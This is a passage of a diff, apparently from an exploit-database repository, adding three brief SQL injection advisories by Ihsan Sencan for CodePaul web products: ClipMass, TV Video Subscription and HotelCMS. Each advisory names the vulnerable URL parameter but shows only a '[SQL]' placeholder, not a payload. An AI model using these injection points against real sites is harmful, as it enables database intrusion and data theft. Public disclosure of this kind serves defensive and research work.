|
||||
# Exploit Title: CodePaul ClipMass - Video Portal Site - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://codepaul.com/
|
||||
# Software Buy: https://codecanyon.net/item/codepaul-clipmass-video-portal-site/14681505
|
||||
# Demo: http://codepaul.com/clipmass/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/search?keyword=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41306.txt
Executable file
17
platforms/php/webapps/41306.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: TV - Video Subscription - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://codepaul.com/
|
||||
# Software Buy: https://codecanyon.net/item/tv-video-subscription/13966427
|
||||
# Demo: http://codepaul.com/tv/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/search?keyword=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41307.txt
Executable file
17
platforms/php/webapps/41307.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: HotelCMS with Booking Engine - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://codepaul.com/
|
||||
# Software Buy: https://codecanyon.net/item/hotelcms-with-booking-engine/12789671
|
||||
# Demo: http://codepaul.com/hotelcms/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/locale?locale=[SQL]
|
||||
# # # # #
|
Loading…
Add table
Reference in a new issue